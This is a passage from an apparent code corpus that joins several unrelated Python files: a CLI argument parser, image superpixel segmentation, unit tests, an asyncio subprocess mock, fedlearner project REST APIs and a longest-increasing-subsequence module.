        """Build the argument parser, store parsed values as attributes,
        and return the parser."""
        parser = argparse.ArgumentParser(
            description=__doc__.replace('\n\n', '--par--').replace('\n', ' ').replace('--par--', '\n\n'),
            formatter_class=argparse.RawDescriptionHelpFormatter,
        )
        parser.add_argument(
            'joblist',
            nargs='*',
            type=int,
            help='job(s) to run (by index as per --list) (default: run all jobs)',
            metavar='JOB',
        )
        parser.add_argument('-V', '--version', action='version', version=f'{__project_name__} {__version__}')
        parser.add_argument('-v', '--verbose', action='store_true', help='show logging output')
        # Switches that override the default file locations.
        group = parser.add_argument_group('override file defaults')
        group.add_argument(
            '--jobs',
            '--urls',
            default=self.jobs,
            type=Path,
            help='read job list (URLs) from FILE',
            metavar='FILE',
            dest='jobs',
        )
        group.add_argument(
            '--config', default=self.config, type=Path, help='read configuration from FILE', metavar='FILE'
        )
        group.add_argument('--hooks', default=self.hooks, type=Path, help='use FILE as hooks.py module', metavar='FILE')
        group.add_argument(
            '--cache',
            default=self.cache,
            type=Path,
            help='use FILE as cache (snapshots database) or directory, alternatively a redis URI',
            metavar='FILE',
        )
        group.add_argument('--list', action='store_true', help='list jobs and their index number')
        group.add_argument('--errors', action='store_true', help='list jobs with errors or no data captured')
        group.add_argument(
            '--test',
            '--test-filter',
            help='test a job (by index or URL/command) and show filtered output',
            metavar='JOB',
            dest='test_job',
        )
        group.add_argument(
            '--test-diff',
            '--test-diff-filter',
            help='test and show diff using existing saved snapshots of a job (by index or URL/command)',
            metavar='JOB',
            dest='test_diff',
        )
        group.add_argument(
            '--add',
            help='add job (key1=value1,key2=value2,...). WARNING: all remarks are deleted from '
            'jobs file; use --edit instead!',
            metavar='JOB',
        )
        group.add_argument(
            '--delete',
            help='delete job by URL/command or index number. WARNING: all remarks are '
            'deleted from jobs file; use --edit instead!',
            metavar='JOB',
        )
        # Reporter testing and credential management.
        group = parser.add_argument_group('reporters')
        group.add_argument('--test-reporter', help='send a test notification', metavar='REPORTER')
        group.add_argument(
            '--smtp-login',
            action='store_true',
            help='verify SMTP login credentials with server and, if stored in keyring, enter or check ' 'password',
        )
        group.add_argument('--telegram-chats', action='store_true', help='list telegram chats program is joined to')
        group.add_argument(
            '--xmpp-login', action='store_true', help='enter or check password for XMPP (stored in keyring)'
        )
        # Switches that open files in the user's editor.
        group = parser.add_argument_group('launch editor ($EDITOR/$VISUAL)')
        group.add_argument('--edit', action='store_true', help='edit job (URL/command) list')
        group.add_argument('--edit-config', action='store_true', help='edit configuration file')
        group.add_argument('--edit-hooks', action='store_true', help='edit hooks script')
        # Snapshot database maintenance.
        group = parser.add_argument_group('database')
        group.add_argument(
            '--gc-cache',
            action='store_true',
            help='garbage collect the cache database by removing old snapshots plus all data of jobs'
            ' not in the jobs file',
        )
        group.add_argument('--clean-cache', action='store_true', help='remove old snapshots from the cache database')
        group.add_argument(
            '--rollback-cache',
            type=int,
            help='delete recent snapshots > timestamp; backup the database before using!',
            metavar='TIMESTAMP',
        )
        group.add_argument(
            '--delete-snapshot', help='delete the last saved snapshot of job (URL/command)', metavar='JOB'
        )
        group.add_argument(
            '--database-engine',
            default='sqlite3',
            choices=['sqlite3', 'redis', 'minidb', 'textfiles'],
            help='database engine to use (default: %(default)s unless redis URI in --cache)',
        )
        group.add_argument(
            '--max-snapshots',
            default=4,
            type=int,
            help='maximum number of snapshots to retain in sqlite3 database (default: %(default)s)',
            metavar='NUM_SNAPSHOTS',
        )
        group = parser.add_argument_group('miscellaneous')
        group.add_argument('--features', action='store_true', help='list supported job types, filters and reporters')
        group.add_argument(
            '--log-level',
            default='DEBUG',
            choices=('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'),
            help='level of logging output if -v is selected (default: %(default)s)',
        )
        # workaround for avoiding triggering error when invoked by pytest
        # (or by CI): skip actual parsing so importing doesn't consume
        # pytest's own command line.
        if parser.prog != '_jb_pytest_runner.py' and not os.getenv('CI'):
            args = parser.parse_args()
            # Copy each parsed value onto this object as an attribute.
            for arg in vars(args):
                argval = getattr(args, arg)
                setattr(self, arg, argval)
        return parser
| 2.265625 | 2 |
src/superpixels.py | dotimothy/EECS195-Colorization | 2 | 12767358 | # superpixels.py Performs SLIC algorithm #
# Authors: <NAME>, <NAME>, <NAME>, <NAME>``
# import the necessary packages
from skimage.segmentation import slic
from skimage.segmentation import mark_boundaries
from skimage.util import img_as_float
from skimage.util import img_as_ubyte
from skimage import data, io, segmentation, color
from skimage.color import rgb2gray
from skimage.future import graph
import matplotlib.pyplot as plt
import argparse
import numpy as np
import cv2
import os
# Weighting Functions based on Color Intensities
def _weight_mean_color(graph, src, dst, n):
diff = graph.nodes[dst]['mean color'] - graph.nodes[n]['mean color']
diff = np.linalg.norm(diff)
return {'weight': diff}
def merge_mean_color(graph, src, dst):
    """RAG merge callback: fold node *src*'s color statistics into *dst*.

    Accumulates total color and pixel count on the surviving node *dst*,
    then refreshes its mean color.
    """
    dst_data = graph.nodes[dst]
    src_data = graph.nodes[src]
    dst_data['total color'] += src_data['total color']
    dst_data['pixel count'] += src_data['pixel count']
    dst_data['mean color'] = dst_data['total color'] / dst_data['pixel count']
# Grayscale & Segments the Image as a Color
def segmentImage(sourcePath, destPath, numSegments=10000, thresh=35):
    """Segment an image with SLIC superpixels followed by RAG color merging.

    The image is oversegmented with SLIC on a grayscale copy, then
    neighbouring superpixels whose mean colors (taken from the original
    color image) are closer than ``thresh`` are merged hierarchically,
    and the flat-color result is written to ``destPath``.

    :param sourcePath: path of the input image
    :param destPath: path where the segmented image is saved
    :param numSegments: approximate number of SLIC superpixels
        (default 10000, matching the previous hard-coded value)
    :param thresh: RAG merge threshold on mean-color distance (default 35)
    """
    image_gray = rgb2gray(io.imread(sourcePath))
    image = io.imread(sourcePath)
    # SLIC runs on a 3-channel float version of the grayscale image.
    image_gray = np.dstack([image_gray, image_gray, image_gray])
    image_gray = img_as_float(image_gray)
    # apply SLIC and extract (approximately) the requested number of segments
    segments = slic(image_gray, n_segments=numSegments, sigma=5)
    # Merge perceptually-similar neighbouring superpixels via a region
    # adjacency graph built on the mean colors of the *color* image.
    g = graph.rag_mean_color(image, segments)
    labels2 = graph.merge_hierarchical(segments, g, thresh=thresh, rag_copy=False,
                                       in_place_merge=True,
                                       merge_func=merge_mean_color,
                                       weight_func=_weight_mean_color)
    out = color.label2rgb(labels2, image, kind='avg', bg_label=0)
    # Saving Image
    io.imsave(destPath, img_as_ubyte(out))
# Segments
def segmentFolder(source, dest):
    """Segment every .jpg/.png image in *source*, writing results to *dest*.

    File names are preserved; non-image files are skipped.
    """
    for file in os.listdir(source):
        # Accept the same four extensions as before, via a single endswith().
        if file.endswith(('.jpg', '.png', '.JPG', '.PNG')):
            # Bug fix: os.path.join works whether or not the caller's paths
            # end with a separator; plain ``source + file`` silently produced
            # a wrong path when they did not.
            segmentImage(os.path.join(source, file), os.path.join(dest, file))
| 2.59375 | 3 |
skultrafast/tests/test_data_io.py | cZahn/skultrafast | 1 | 12767359 | <gh_stars>1-10
from skultrafast import data_io
from pathlib import Path
def test_load_exmaple():
    # NOTE(review): function name contains a typo ("exmaple"); kept unchanged
    # so pytest collection and any references to it keep working.
    wl, t, d = data_io.load_example()
    # Data matrix must be (time points x wavelengths).
    assert d.shape == (t.shape[0], wl.shape[0])
def test_path_loader():
    """Every bundled example dataset path must exist on disk."""
    for example in ('sys_response', 'messpy'):
        assert Path(data_io.get_example_path(example)).exists()
| 2.15625 | 2 |
src/aiotk/_testing.py | AndreLouisCaron/aiotk | 5 | 12767360 | # -*- coding: utf-8 -*-
import asyncio
import inspect
import os
import signal as _signal
import sys
import traceback
from asyncio import (
AbstractEventLoop,
StreamReader,
StreamWriter,
)
from asyncio import Queue # noqa: F401
from contextlib import contextmanager
from itertools import count
from unittest import mock
from typing import (
Callable,
Iterable,
Iterator,
Optional,
TextIO,
Tuple,
Union,
)
from ._mempipe import mempipe
def call_with_minimal_args(f: Callable, **kwds):
    """Invoke *f* with only the keyword arguments its signature declares.

    Extra entries in *kwds* are silently dropped, and a ``**kwargs``
    catch-all parameter on *f* is ignored rather than fed the whole dict.
    A declared parameter missing from *kwds* raises ``KeyError``.
    """
    accepted = {}
    for name, param in inspect.signature(f).parameters.items():
        if param.kind != inspect.Parameter.VAR_KEYWORD:
            accepted[name] = kwds[name]
    return f(**accepted)
class OutputStreamAdapter(StreamWriter):
    """Adapt a text-mode file object to the ``StreamWriter`` interface.

    Bytes handed to :meth:`write` / :meth:`writelines` are decoded as UTF-8
    and forwarded to the wrapped stream.
    """

    def __init__(self, stream: TextIO) -> None:
        self._stream = stream

    def write(self, data: bytes) -> None:
        text = data.decode('utf-8')
        self._stream.write(text)

    def writelines(self, lines: Iterable[bytes]) -> None:
        # Each line is followed by a newline, mirroring text-mode output.
        for line in lines:
            self._stream.write(line.decode('utf-8'))
            self._stream.write('\n')

    def can_write_eof(self) -> bool:
        return True

    # TODO: test this without closing the "real" sys.stdout!
    def write_eof(self) -> None:
        pass

    # NOTE: signature kept loose because the documented StreamWriter
    # signature is incomplete for type checkers.
    async def drain(self):
        # Flush buffered data through to the underlying file object.
        self._stream.flush()
class Process(object):
    """Mock for ``asyncio.subprocess.Process``.

    Instead of forking a real child, an application-supplied ``run``
    coroutine is scheduled on the event loop and wired to in-memory
    stdin/stdout/stderr streams, a fake signal queue and a simulated exit
    code, so subprocess-driving code can be tested in-process.
    """
    # NOTE(review): argv=[] / kwds={} are shared mutable defaults; safe only
    # because they are never mutated here — confirm before reusing.
    def __init__(self, *,
                 pid: int,
                 run: Callable,
                 argv=[],
                 env=None,
                 kwds={},
                 stdin: Optional[int]=None,
                 stdout: Union[int, TextIO, None]=None,
                 stderr: Union[int, TextIO, None]=None,
                 limit: Optional[int]=None,
                 loop: Optional[AbstractEventLoop]=None) -> None:
        self._loop = loop or asyncio.get_event_loop()
        self._pid = pid
        self._stdin = None  # type: Optional[StreamWriter]
        self._stdout = None  # type: Optional[StreamReader]
        self._stderr = None  # type: Optional[StreamReader]
        # Handle standard input redirection.
        r_stdin = None  # Optional[StreamReader]
        if stdin == asyncio.subprocess.PIPE:
            # The writer end is exposed as ``self.stdin``; the reader end is
            # handed to the simulated child.
            r_stdin, self._stdin = mempipe(limit=limit, loop=loop)
        else:
            # TODO: wrap `sys.stdin` in a `StreamReader`.
            r_stdin, self._stdin = None, None
        # Handle standard output redirection.
        if stdout == asyncio.subprocess.PIPE:
            self._stdout, w_stdout = mempipe(limit=limit, loop=loop)
        else:
            # Unredirected output goes to the (possibly overridden) real
            # stdout through the file-object adapter.
            stdout = stdout or sys.stdout
            assert stdout is not None
            assert not isinstance(stdout, int)
            self._stdout, w_stdout = None, OutputStreamAdapter(stdout)
        # Handle standard error redirection.
        if stderr == asyncio.subprocess.PIPE:
            self._stderr, w_stderr = mempipe(limit=limit, loop=loop)
        else:
            stderr = stderr or sys.stderr
            assert stderr is not None
            assert not isinstance(stderr, int)
            self._stderr, w_stderr = None, OutputStreamAdapter(stderr)
        # Mock signal handling.
        self._signals = asyncio.Queue()  # type: Queue
        # Start the application-defined process simulation.
        self._done = asyncio.Event(loop=loop)
        self._task = self._loop.create_task(self._run_wrapper(
            run,
            stdin=r_stdin,
            stdout=w_stdout,
            stderr=w_stderr,
            signals=self._signals,
            env=env or {k: v for k, v in os.environ.items()},
            argv=argv,
            kwds=kwds,
        ))
        # Keep a reference to the streams, we'll need them later.
        self._w_stdout = w_stdout
        self._w_stderr = w_stderr
        # Process exit code is undefined until the simulation completes.
        self._returncode = None  # type: Optional[int]
    async def _run_wrapper(self, run: Callable,
                           *, stdout, stderr, **kwds) -> int:
        """Run the simulation, always flushing streams and signalling done."""
        try:
            # Dependency injection: only pass the arguments ``run`` declares.
            return await call_with_minimal_args(
                run, stdout=stdout, stderr=stderr, **kwds
            )
        except asyncio.CancelledError:
            # terminate() cancels the task; report conventional exit code 1.
            return 1
        finally:
            await stdout.drain()
            await stderr.drain()
            self._done.set()
    @property
    def pid(self) -> int:
        """Fake process ID assigned at creation."""
        return self._pid
    @property
    def stdin(self) -> Optional[StreamWriter]:
        """Writer to the child's stdin, or None when not piped."""
        return self._stdin
    @property
    def stdout(self) -> Optional[StreamReader]:
        """Reader of the child's stdout, or None when not piped."""
        return self._stdout
    @property
    def stderr(self) -> Optional[StreamReader]:
        """Reader of the child's stderr, or None when not piped."""
        return self._stderr
    async def wait(self) -> int:
        """Wait for the simulation to finish and return its exit code."""
        await asyncio.wait({self._task})
        await self._done.wait()
        e = self._task.exception()
        if e is None:
            # A ``None`` result means success (exit code 0).
            r = self._task.result()
            if r is None:
                r = 0
            self._returncode = r
        else:
            # Format traceback and send it to stderr (as if it had been printed
            # in the child process' output).
            self._w_stderr.writelines(
                line.encode('utf-8')
                for line in traceback.format_exception(
                    e.__class__, e, e.__traceback__
                )
            )
            self._returncode = 1
        assert self._w_stdout
        assert self._w_stderr
        self._w_stdout.write_eof()
        self._w_stderr.write_eof()
        return self._returncode
    async def communicate(self, input: bytes=b'') -> Tuple[Optional[bytes],
                                                           Optional[bytes]]:
        """Feed *input* to stdin, wait for exit, return (stdout, stderr)."""
        if self._stdin:
            self._stdin.write(input)
            self._stdin.write_eof()
        await self.wait()
        stdout = None
        if self._stdout:
            stdout = await self._stdout.read()
        stderr = None
        if self._stderr:
            stderr = await self._stderr.read()
        return stdout, stderr
    def send_signal(self, signal: int) -> None:
        """Deliver *signal* to the simulation via the mock signal queue."""
        self._signals.put_nowait(signal)
    def terminate(self) -> None:
        """Cancel the simulation task (analogous to SIGTERM)."""
        self._task.cancel()
    def kill(self) -> None:
        """Forcefully stop the simulation (platform-dependent, like asyncio)."""
        if sys.platform == 'win32':
            self.terminate()
        else:
            # NOTE: for a real process, we'd send SIGKILL, which would then be
            # passed as SIGINT to the application, but we don't have a
            # kernel to make that substution here.
            self.send_signal(_signal.SIGINT)
    @property
    def returncode(self) -> Optional[int]:
        """Exit code, or None while the simulation is still running."""
        return self._returncode
@contextmanager
def mock_subprocess(run: Callable,
                    loop: Optional[AbstractEventLoop]=None) -> Iterator[None]:
    """Calls ``run()`` instead of spawning a sub-process.

    :param run: A coroutine function that simulates the sub-process.  Can
     return ``None`` or ``0`` to simulate successful process execution or a
     non-zero error code to simulate sub-process terminate with a non-zero exit
     code.  If an exception is raised, the result is 1 (non-zero).  This
     function can accept a variable number of arguments, see below.

    Dependency injection is used with the ``run()`` coroutine function to pass
    only arguments that are declared in the function's signature.  Omit all but
    the arguments you intend to use.  Here are all the available arguments:

    - ``argv``: a list of strings passed as positional arguments to
      ``asyncio.create_subprocess_exec()``.
    - ``stdin``: an ``asyncio.StreamReader`` instance.  When output is not
      redirected, this reads from the "real" ``sys.stdin``.
    - ``stdout``: an ``asyncio.StreamWriter`` instance.  When output is not
      redirected, this writes to the "real" ``sys.stdout``.
    - ``stderr``: an ``asyncio.StreamWriter`` instance.  When output is not
      redirected, this writes to the "real" ``sys.stderr``.
    - ``env``: a ``dict`` containing environment variables passed to
      ``asyncio.create_subprocess_exec()``.
    - ``signals``: an ``asyncio.Queue`` object that receives integers passed to
      ``asyncio.Process.send_signal()``.
    - ``kwds``: extra keyword arguments passed to
      ``asyncio.create_subprocess_exec()``.

    .. versionadded:: 0.1

    """
    loop = loop or asyncio.get_event_loop()
    # Monotonically increasing fake PIDs, one per spawned "process".
    pid = count(start=1)
    def create_subprocess_exec(*args, stdin=None, stdout=None, env=None,
                               stderr=None, loop=None, limit=None, **kwds):
        """Mock for ``asyncio.create_subprocess_exec()``."""
        loop = loop or asyncio.get_event_loop()
        f = asyncio.Future()
        process = Process(
            pid=next(pid),
            run=run,
            loop=loop,
            argv=list(args),
            stdin=stdin,
            stdout=stdout,
            stderr=stderr,
            env=env,
            limit=limit,
            kwds=kwds,
        )
        # Resolve the future on the next loop iteration, mimicking the real
        # coroutine's asynchronous completion.
        loop.call_soon(f.set_result, process)
        return f
    # Patch by name so any code awaiting asyncio.create_subprocess_exec()
    # inside the ``with`` block gets the mock instead.
    with mock.patch('asyncio.create_subprocess_exec', create_subprocess_exec):
        yield None
| 2.328125 | 2 |
deuceclient/tests/test_api_project.py | BenjamenMeyer/deuce-client | 0 | 12767361 | """
Tests - Deuce Client - API - Project
"""
from unittest import TestCase
import deuceclient.api as api
import deuceclient.common.errors as errors
import deuceclient.common.validation as val
from deuceclient.tests import *
class ProjectTest(TestCase):
    """Unit tests for :class:`deuceclient.api.Project`."""

    def setUp(self):
        super(ProjectTest, self).setUp()
        # Fresh randomized identifiers for every test.
        self.project_id = create_project_name()
        self.vault_id = create_vault_name()

    def test_create_project(self):
        project = api.Project(self.project_id)
        self.assertEqual(project.project_id, self.project_id)

    def test_create_project_bad_type(self):
        # Bug fix: ``bytes(self.project_id)`` itself raises TypeError on
        # Python 3 (str without an encoding), so api.Project was never
        # actually called.  Encode explicitly so the constructor's own type
        # check is what gets exercised.
        with self.assertRaises(TypeError):
            api.Project(self.project_id.encode('utf-8'))

    def test_project_name_invalid(self):
        # Invalid character in the name.
        with self.assertRaises(errors.InvalidProject):
            api.Project(self.project_id + '$')

        # Build a project name that exceeds the maximum allowed length.
        x = self.project_id
        while len(x) < (val.PROJECT_ID_MAX_LEN + 1):
            x = '{0}_{1}'.format(x, self.project_id)

        with self.assertRaises(errors.InvalidProject):
            api.Project(x)

    def test_set_marker(self):
        project = api.Project(self.project_id)
        self.assertIsNone(project.marker)

        project.marker = self.vault_id
        self.assertIsNotNone(project.marker)
        self.assertEqual(project.marker,
                         self.vault_id)

        project.marker = None
        self.assertIsNone(project.marker)

    def test_project_add_vault(self):
        project = api.Project(self.project_id)
        vault = api.Vault(self.project_id,
                          self.vault_id)
        project[vault.vault_id] = vault
        self.assertEqual(vault, project[vault.vault_id])

    def test_project_add_vault_invalid(self):
        project = api.Project(self.project_id)
        with self.assertRaises(errors.InvalidVault):
            project[self.vault_id + '$'] = {}

    def test_project_get_vault_invalid(self):
        project = api.Project(self.project_id)
        with self.assertRaises(errors.InvalidVault):
            # Lookup alone must trigger vault-name validation.
            project[self.vault_id + '$']

    def test_project_update_vault(self):
        project = api.Project(self.project_id)
        vaults = {
            x: api.Vault(self.project_id, x) for x in [create_vault_name()]
        }
        project.update(vaults)
        for k, vt in vaults.items():
            self.assertEqual(vt, project[k])

    def test_project_update_vault_invalid(self):
        project = api.Project(self.project_id)
        # Values must be Vault instances, not plain strings.
        vaults = {
            x: x for x in [create_vault_name()]
        }
        with self.assertRaises(TypeError):
            project.update(vaults)

    def test_repr(self):
        project = api.Project(self.project_id)
        # Just verify that repr() does not raise.
        repr(project)
| 2.75 | 3 |
web_console_v2/api/fedlearner_webconsole/project/apis.py | duanbing/fedlearner | 0 | 12767362 | # Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
# pylint: disable=raise-missing-from
import re
from enum import Enum
from uuid import uuid4
from sqlalchemy.sql import func
from flask import request
from flask_restful import Resource, Api, reqparse
from google.protobuf.json_format import ParseDict
from fedlearner_webconsole.db import db
from fedlearner_webconsole.project.models import Project
from fedlearner_webconsole.proto.common_pb2 import Variable, StatusCode
from fedlearner_webconsole.proto.project_pb2 \
import Project as ProjectProto, CertificateStorage, \
Participant as ParticipantProto
from fedlearner_webconsole.project.add_on \
import parse_certificates, verify_certificates, create_add_on
from fedlearner_webconsole.exceptions \
import InvalidArgumentException, NotFoundException
from fedlearner_webconsole.rpc.client import RpcClient
from fedlearner_webconsole.utils.k8s_client import k8s_client
from fedlearner_webconsole.workflow.models import Workflow
_CERTIFICATE_FILE_NAMES = [
'client/client.pem', 'client/client.key', 'client/intermediate.pem',
'client/root.pem', 'server/server.pem', 'server/server.key',
'server/intermediate.pem', 'server/root.pem'
]
_URL_REGEX = r'(?:^((?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])(?:\.' \
r'(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3})(?::+' \
r'(\d+))?$)|(?:^\[((?:(?:[0-9a-fA-F:]){1,4}(?:(?::(?:[0-9a-fA-F]' \
r'){1,4}|:)){2,7})+)\](?::+(\d+))?|((?:(?:[0-9a-fA-F:]){1,4}(?:(' \
r'?::(?:[0-9a-fA-F]){1,4}|:)){2,7})+)$)'
class ErrorMessage(Enum):
    """Template strings for the error details raised by this module."""
    # Filled via str.format with (parameter name, reason).
    PARAM_FORMAT_ERROR = 'Format of parameter {} is wrong: {}'
    # Filled via str.format with the conflicting project name.
    NAME_CONFLICT = 'Project name {} has been used.'
class ProjectsApi(Resource):
    """Collection resource: create a new project or list all projects."""

    def post(self):
        """Create a project from {name, config, comment}.

        Validates the participant list (currently exactly one participant),
        optionally installs the certificate add-on, and persists the
        project. Raises InvalidArgumentException on any validation failure.
        """
        parser = reqparse.RequestParser()
        parser.add_argument('name',
                            required=True,
                            type=str,
                            help=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
                                'name', 'Empty'))
        parser.add_argument('config',
                            required=True,
                            type=dict,
                            help=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
                                'config', 'Empty'))
        parser.add_argument('comment')
        data = parser.parse_args()
        name = data['name']
        config = data['config']
        comment = data['comment']

        # Project names must be unique.
        if Project.query.filter_by(name=name).first() is not None:
            raise InvalidArgumentException(
                details=ErrorMessage.NAME_CONFLICT.value.format(name))

        if config.get('participants') is None:
            raise InvalidArgumentException(
                details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
                    'participants', 'Empty'))
        if len(config.get('participants')) != 1:
            # TODO: remove limit after operator supports multiple participants
            raise InvalidArgumentException(
                details='Currently not support multiple participants.')

        # Extract host configuration from the project variables.
        # TODO: one custom host for one participant
        grpc_ssl_server_host = None
        egress_host = None
        for variable in config.get('variables', []):
            if variable.get('name') == 'GRPC_SSL_SERVER_HOST':
                grpc_ssl_server_host = variable.get('value')
            if variable.get('name') == 'EGRESS_HOST':
                egress_host = variable.get('value')

        # Parse and validate each participant; collect their certificates.
        certificates = {}
        for participant in config.get('participants'):
            if 'name' not in participant.keys() or \
                    'domain_name' not in participant.keys():
                raise InvalidArgumentException(
                    details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
                        'participants', 'Participant must have name and '
                                        'domain_name.'))
            domain_name = participant.get('domain_name')
            # Grpc spec: the authority defaults to a name derived from the
            # participant's domain (".com" suffix stripped) unless an
            # explicit EGRESS_HOST variable was provided.
            participant['grpc_spec'] = {
                'authority':
                    egress_host or '{}-client-auth.com'.format(domain_name[:-4])
            }
            if participant.get('certificates'):
                # If users use web console to create add-on,
                # peer url must be given
                if 'url' not in participant.keys():
                    raise InvalidArgumentException(
                        details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
                            'participants', 'Participant must have url.'))
                if re.match(_URL_REGEX, participant.get('url')) is None:
                    raise InvalidArgumentException('URL pattern is wrong')
                current_cert = parse_certificates(
                    participant.get('certificates'))
                success, err = verify_certificates(current_cert)
                if not success:
                    raise InvalidArgumentException(err)
                certificates[domain_name] = {'certs': current_cert}
            # Certificates are stored separately, never inside the config.
            if 'certificates' in participant.keys():
                participant.pop('certificates')

        new_project = Project()
        # Generate the token: honour a caller-supplied token, otherwise
        # create a fresh one by uuid.
        config['name'] = name
        token = config.get('token', uuid4().hex)
        config['token'] = token

        # Check format of config by round-tripping it through the proto.
        try:
            new_project.set_config(ParseDict(config, ProjectProto()))
        except Exception as e:
            raise InvalidArgumentException(
                details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
                    'config', e))
        new_project.set_certificate(
            ParseDict({'domain_name_to_cert': certificates},
                      CertificateStorage()))
        new_project.name = name
        # BUGFIX: this assignment was corrupted; persist the generated token.
        new_project.token = token
        new_project.comment = comment

        # Create the k8s add-on for every participant we hold certs for.
        for participant in new_project.get_config().participants:
            if participant.domain_name in \
                    new_project.get_certificate().domain_name_to_cert.keys():
                _create_add_on(
                    participant,
                    new_project.get_certificate().domain_name_to_cert[
                        participant.domain_name], grpc_ssl_server_host)
        try:
            new_project = db.session.merge(new_project)
            db.session.commit()
        except Exception as e:
            raise InvalidArgumentException(details=str(e))

        return {'data': new_project.to_dict()}

    def get(self):
        """List all projects, each annotated with its workflow count."""
        # TODO: Not count soft-deleted workflow
        projects = db.session.query(
            Project, func.count(Workflow.id).label('num_workflow')) \
            .join(Workflow, Workflow.project_id == Project.id, isouter=True) \
            .group_by(Project.id) \
            .all()
        result = []
        for project in projects:
            project_dict = project.Project.to_dict()
            project_dict['num_workflow'] = project.num_workflow
            result.append(project_dict)
        return {'data': result}
class ProjectApi(Resource):
    """Single-project resource: fetch or partially update one project."""

    def get(self, project_id):
        """Return the project with the given id, or 404."""
        project = Project.query.filter_by(id=project_id).first()
        if project is None:
            raise NotFoundException()
        return {'data': project.to_dict()}

    def patch(self, project_id):
        """Partially update token, variables and/or comment of a project.

        Changing the variables re-creates the certificate add-ons and may
        update each participant's gRPC authority from EGRESS_HOST.
        """
        project = Project.query.filter_by(id=project_id).first()
        if project is None:
            raise NotFoundException()
        config = project.get_config()
        if request.json.get('token') is not None:
            new_token = request.json.get('token')
            config.token = new_token
            project.token = new_token
        if request.json.get('variables') is not None:
            # Replace the variable list wholesale.
            del config.variables[:]
            config.variables.extend([
                ParseDict(variable, Variable())
                for variable in request.json.get('variables')
            ])

        # Extract host configuration from the (possibly updated) variables.
        grpc_ssl_server_host = None
        egress_host = None
        for variable in config.variables:
            if variable.name == 'GRPC_SSL_SERVER_HOST':
                grpc_ssl_server_host = variable.value
            if variable.name == 'EGRESS_HOST':
                egress_host = variable.value

        if request.json.get('comment'):
            project.comment = request.json.get('comment')

        for participant in config.participants:
            if participant.domain_name in \
                    project.get_certificate().domain_name_to_cert.keys():
                _create_add_on(
                    participant,
                    project.get_certificate().domain_name_to_cert[
                        participant.domain_name], grpc_ssl_server_host)
            if egress_host:
                participant.grpc_spec.authority = egress_host
        project.set_config(config)
        try:
            db.session.commit()
        except Exception as e:
            # BUGFIX: pass the message, not the exception object,
            # consistent with the other handlers in this module.
            raise InvalidArgumentException(details=str(e))
        return {'data': project.to_dict()}
class CheckConnectionApi(Resource):
    """Resource that probes gRPC connectivity to every participant."""

    def post(self, project_id):
        """Check all participants of a project; report overall success."""
        project = Project.query.filter_by(id=project_id).first()
        if project is None:
            raise NotFoundException()
        details = []
        # TODO: Concurrently check
        for participant in project.get_config().participants:
            status = self.check_connection(project.get_config(), participant)
            if status.code != StatusCode.STATUS_SUCCESS:
                details.append(status.msg)
        # Overall success means every single participant answered OK.
        return {'data': {'success': not details, 'details': details}}

    def check_connection(self, project_config: ProjectProto,
                         participant_proto: ParticipantProto):
        """Return the gRPC status of one participant's connection check."""
        rpc = RpcClient(project_config, participant_proto)
        return rpc.check_connection().status
def initialize_project_apis(api: Api):
    """Register the project REST resources on the given Flask-RESTful API."""
    api.add_resource(ProjectsApi, '/projects')
    api.add_resource(ProjectApi, '/projects/<int:project_id>')
    api.add_resource(CheckConnectionApi,
                     '/projects/<int:project_id>/connection_checks')
def _create_add_on(participant, certificate, grpc_ssl_server_host=None):
    """Install the k8s certificate add-on for one participant.

    Silently does nothing when no certificate is stored; raises
    InvalidArgumentException when a required certificate file is missing
    or when the add-on creation itself fails.
    """
    if certificate is None:
        return
    # Validate that every required certificate file is present; report the
    # first one that is missing.
    missing = next((file_name for file_name in _CERTIFICATE_FILE_NAMES
                    if certificate.certs.get(file_name) is None), None)
    if missing is not None:
        raise InvalidArgumentException(
            details=ErrorMessage.PARAM_FORMAT_ERROR.value.format(
                'certificates', '{} not existed'.format(missing)))
    try:
        create_add_on(k8s_client, participant.domain_name, participant.url,
                      certificate.certs, grpc_ssl_server_host)
    except RuntimeError as e:
        raise InvalidArgumentException(details=str(e))
| 1.648438 | 2 |
longest_increasing_subsequence/_implementation.py | mCodingLLC/longest_increasing_subsequence | 7 | 12767363 | """Implementation of the longest increasing subsequence algorithm."""
import operator
from bisect import bisect_right, bisect_left
from typing import TypeVar, Optional, List, Any, Iterator, Sequence, Callable
T = TypeVar('T')
def longest_increasing_subsequence(seq: Sequence[T], strict=False, key: Optional[Callable] = None) -> List[T]:
    """
    Returns the longest increasing subsequence of the given sequence.

    There may be other increasing subsequences of the same length.

    >>> longest_increasing_subsequence([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])
    [0, 2, 6, 9, 11, 15]
    >>> longest_increasing_subsequence([0, 0, 1, 2, 3, 2, 1, 0, 0])
    [0, 0, 1, 2, 2]
    >>> longest_increasing_subsequence([0, 0, 1, 2, 3], strict=True)
    [0, 1, 2, 3]
    >>> longest_increasing_subsequence(['A', 'B', 'CC', 'D', 'EEE'], key=len)
    ['A', 'B', 'D', 'EEE']
    >>> "".join(longest_increasing_subsequence('aababbbdccddd'))
    'aaabbbccddd'

    :param seq: A sequence-like container of comparable objects.
    :param strict: Whether the subsequence must be strictly increasing.
    :param key: If not None, values in sequence are compared by comparing their keys.
    :return: The longest increasing subsequence in seq as a list.
    """
    return _longest_monotone_subsequence(seq, True, strict, key)
def longest_decreasing_subsequence(seq: Sequence[T], strict=False, key: Optional[Callable] = None) -> List[T]:
    """
    Returns the longest decreasing subsequence of the given sequence.

    There may be other decreasing subsequences of the same length.

